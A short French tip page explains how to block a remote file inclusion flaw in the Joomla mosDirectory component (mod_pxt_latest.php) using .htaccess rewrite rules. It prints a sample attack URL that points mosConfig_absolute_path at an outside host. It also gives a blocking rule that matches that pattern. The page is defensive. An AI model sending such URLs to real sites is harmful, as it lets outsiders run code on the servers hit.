HTACCESS

Eviter la faille de sécurité de Joomla (mosDirectory)

Cette faille de sécurité par RFI (remote file include) existe dans le composant mosDirectory de joomla.

La vulnérabilité concerne le script mod_pxt_latest.php.

Les url concernées sont de la forme : http://www.example.com/com_directory/modules/mod_pxt_latest.php? GLOBALS[mosConfig_absolute_path]=http://www.sitepourri.com/page.txt??

RewriteCond %{QUERY_STRING} ^(.*&)?GLOBALS\[mosConfig_absolute_path\]=http://
RewriteRule ^(.*/)?com_directory/modules/mod_pxt_latest.php$ - [F,L]
PHP